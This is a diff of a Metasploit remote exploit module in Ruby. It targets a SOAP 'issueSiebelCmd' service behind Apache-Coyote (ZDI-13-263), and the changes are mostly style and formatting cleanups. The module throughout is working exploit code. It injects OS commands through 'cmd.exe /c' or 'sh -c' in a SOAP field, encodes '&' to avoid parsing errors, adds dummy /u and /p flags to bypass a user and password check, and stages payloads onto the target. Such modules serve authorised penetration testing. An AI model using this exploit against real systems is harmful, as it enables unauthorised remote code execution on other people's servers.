@@ -8,7 +8,7 @@ require 'rexml/document'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = GreatRanking
 
-  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
+  HttpFingerprint = { pattern: [ /Apache-Coyote/ ] }
 
   include REXML
   include Msf::Exploit::Remote::HttpClient
@@ -37,8 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'ZDI', '13-263' ]
         ],
         'Privileged' => true,
-        'Platform' => %w{win unix},
-        'Arch' => [ ARCH_X86, ARCH_CMD ],
         'Payload' => {
           'Space' => 2048,
           'DisableNops' => true
@@ -86,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    value = rand_text_alpha(8 + rand(10))
+    value = rand_text_alpha(rand(8..17))
 
     res = send_soap_request(value)
 
@@ -99,24 +97,24 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     if target.name =~ /Windows/
-      print_status("Delivering payload...")
+      print_status('Delivering payload...')
       # cmd.exe max length is 8192
-      execute_cmdstager({ :linemax => 8000, :nodelete => true })
+      execute_cmdstager({ linemax: 8000, nodelete: true })
     elsif target.name =~ /Linux/
-      print_status("Executing payload...")
-      execute_command(payload.encoded, { :http_timeout => 1 })
+      print_status('Executing payload...')
+      execute_command(payload.encoded, { http_timeout: 1 })
     end
   end
 
   def execute_command(cmd, opts = {})
     if target.name =~ /Windows/
-      cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")
-      command = "cmd.exe /c "
-      command << cmd.gsub(/&/, "&#x26;") # HTML Encode '&' character to avoid soap request parsing errors
+      cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, 'data = Replace(data, " " + vbCrLf, "")')
+      command = 'cmd.exe /c '
+      command << cmd.gsub(/&/, '&#x26;') # HTML Encode '&' character to avoid soap request parsing errors
       command << " &#x26; /u #{rand_text_alpha(4)} /p #{rand_text_alpha(4)}" # To bypass user and pass flags check before executing
     elsif target.name =~ /Linux/
-      command = "sh -c "
-      command << cmd.gsub(/&/, "&#x26;") # HTML Encode '&' character to avoid soap request parsing errors
+      command = 'sh -c '
+      command << cmd.gsub(/&/, '&#x26;') # HTML Encode '&' character to avoid soap request parsing errors
       command << " /u #{rand_text_alpha(4)} /p #{rand_text_alpha(4)}" # To bypass user and pass flags check before executing
     end
 
@@ -132,26 +130,26 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_soap_request
     xml = Document.new
     xml.add_element(
-      "soapenv:Envelope",
+      'soapenv:Envelope',
       {
-        'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
-        'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
-        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
-        'xmlns:api' => "http://Api.freshtech.COM"
+        'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
+        'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema',
+        'xmlns:soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/',
+        'xmlns:api' => 'http://Api.freshtech.COM'
       }
     )
-    xml.root.add_element("soapenv:Header")
-    xml.root.add_element("soapenv:Body")
+    xml.root.add_element('soapenv:Header')
+    xml.root.add_element('soapenv:Body')
     body = xml.root.elements[2]
     body.add_element(
-      "api:issueSiebelCmd",
+      'api:issueSiebelCmd',
       {
-        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
+        'soapenv:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
       }
     )
     ser = body.elements[1]
-    ser.add_element("in0", { 'xsi:type' => 'xsd:string' })
-    ser.elements['in0'].text = "MSF_COMMAND"
+    ser.add_element('in0', { 'xsi:type' => 'xsd:string' })
+    ser.elements['in0'].text = 'MSF_COMMAND'
 
     xml.to_s
   end
